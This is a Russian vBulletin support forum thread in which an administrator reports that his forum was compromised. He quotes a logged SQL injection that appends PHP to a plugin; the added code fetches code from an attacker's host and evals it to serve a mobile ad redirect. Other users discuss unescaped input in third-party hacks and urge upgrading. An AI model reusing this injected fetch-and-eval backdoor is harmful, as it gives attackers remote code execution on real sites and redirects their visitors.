VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
Добрый день, заметил что начали ломать воблу вшивая рекламный редирект скрипт.
Каким-то образом взоумышленнику удается выполнить SQL запрос, вот выдержка из логов
Code:
Invalid SQL:
UPDATE plugin SET phpcode=concat(phpcode, "
$config_data = file_get_contents(\'http://images.imagenetcom.com/xml.php?a=inner&host=\' . $_SERVER[\'SERVER_NAME\']);\r\nif(strlen($config_data) > 0){ eval($config_data); }\n") WHERE pluginid=760;
т.е. человек дописывает либо в конец существующего либо создает новый модуль с кодом запроса рекламного скрипта.
на его сайте видно что взломано очень много форумов различных версий, в том числе и популярный http://clubvolvo.ru/forum.php
видно что код выполняется у них тоже.
Кто сталкивался уже, в чем суть дыры, я перелопатил кучу логов, пока безрезультатно.
п.с. никаких стремных модулей у меня не установлено, айпи с которого сработала ошибка якобы принадлежит поисковику bing.com
обновлять воблу не вариант, многое переписано уже, понятно что дело именно в вобле, так как в числе ломаных сайтов именно этот двиг
дырявые хаки, которые не экранируют входящие данные в пост/гет запросах, могут послужить добавлением не большого куска кода в модуль
ну а далее дело техники, используя этот модуль, можно залить более "тяжелый" шелл, а дальше все и так понятно =)
kerk
k0t
Join Date: May 2005
Location: localhost
Posts: 28,833
Версия vB: 3.8.x
Пол:
Reputation:
Гуру 20329
Репутация в разделе: 7757
0
Quote:
Originally Posted by Андрюшкин
вшивая рекламный редирект скрипт
а что это означает?
кто и как может что то "вшивать" не имея доступа ни к админке, ни к файлам сервера?
дырявые хаки, которые не экранируют входящие данные в пост/гет запросах, могут послужить добавлением не большого куска кода в модуль
ну а далее дело техники, используя этот модуль, можно залить более "тяжелый" шелл, а дальше все и так понятно =)
ну суть я понимаю как это делается, прочесал весь access.log на наличие странных запросов, пока ничего не обнаружил, ломали меня 2 раза, через разные скрипты (первый раз attachment.php второй showthread.php думаю суть не в них)
Андрюшкин добавил 17.10.2016 в 17:17
Quote:
Originally Posted by kerk
а что это означает?
кто и как может что то "вшивать" не имея доступа ни к админке, ни к файлам сервера?
вот такая строчка добавляется в существующий модель или в новый
это обычный рекламный мобильный редирект, работу кода можно увидеть только зайдя на форум с мобильного
Last edited by Андрюшкин : 10-17-2016 at 06:17 PM.
Reason: Добавлено сообщение
@Catlord Meow
Специалист
Join Date: Jul 2016
Location: Москва
Posts: 183
Версия vB: 4.2.х
Пол:
Reputation:
Professional 417
Репутация в разделе: 158
0
Quote:
Originally Posted by Андрюшкин
обновлять воблу не вариант, многое переписано уже
Перестаньте есть кактус
Со времён 4.2.2 вышло несколько обновлений, затрагивающих, в частности, уязвимости форума.
Поставьте 4.2.3 PL2 и обновляйте по мере появления релизов.
Перестаньте есть кактус
Со времён 4.2.2 вышло несколько обновлений, затрагивающих, в частности, уязвимости форума.
у меня стоит 3.6.4 обновление движка невозможно, от оригинальной воблы там мало что осталось
Quote:
Originally Posted by Catlord Meow
http://vbsupport.ru/forum/showthread.php?t=52472
тему видел, скорее всего это не мой случай. у меня разрешены к загруpке только 2 типа файлов mp3 и wav
да и судя из логов, запрос был выполнен неавторизированным юзером, а загружать атачи такие не могут
Quote:
Originally Posted by Catlord Meow
А какие установлены?
кроме vbplaza и закрепление первого поста на всех страницах никаких + несколько написанных персонально, но дело не в них, так как ломают форумы и без этих плагинов, значит проблема не в плагинах. дыра либо в версии php либо основательно в движке воблы.
Quote:
Originally Posted by Catlord Meow
Другая CMS, например.
также исключено, ничего больше не используется.
посмотрите здесь какие сайты были взломаны список сайтов
http://images.imagenetcom.com/uploads2/sites/
на всех вобла разных версий
kerk
k0t
Join Date: May 2005
Location: localhost
Posts: 28,833
Версия vB: 3.8.x
Пол:
Reputation:
Гуру 20329
Репутация в разделе: 7757
0
Quote:
Originally Posted by Catlord Meow
Перестаньте есть кактус
Со времён 4.2.2 вышло несколько обновлений
вот как раз узеры четверки и продолжают жевать кактус =)
kerk
k0t
Join Date: May 2005
Location: localhost
Posts: 28,833
Версия vB: 3.8.x
Пол:
Reputation:
Гуру 20329
Репутация в разделе: 7757
0
а, да...
записи в логах, не говорят о том, что был взлом
но была попытка взлома
kerk, вы случайно не помните кто владелец clubvolvo.ru ? он точно есть здесь на форуме, я его почему-то помню, но не помню ник. смотрю он вроде бы пофиксил дыру
по вашим логам не видно как пытались взломать? можно в личку мне, у меня логи стокилометровые, уже глаза лезут искать в них странные запросы((
@Catlord Meow
Специалист
Join Date: Jul 2016
Location: Москва
Posts: 183
Версия vB: 4.2.х
Пол:
Reputation:
Professional 417
Репутация в разделе: 158
1
Quote:
Originally Posted by kerk
вот как раз узеры четверки и продолжают жевать кактус =)
Ну речь всё же не про мажорную версию, а про то, что форум не обновлён до последней стабильной версии.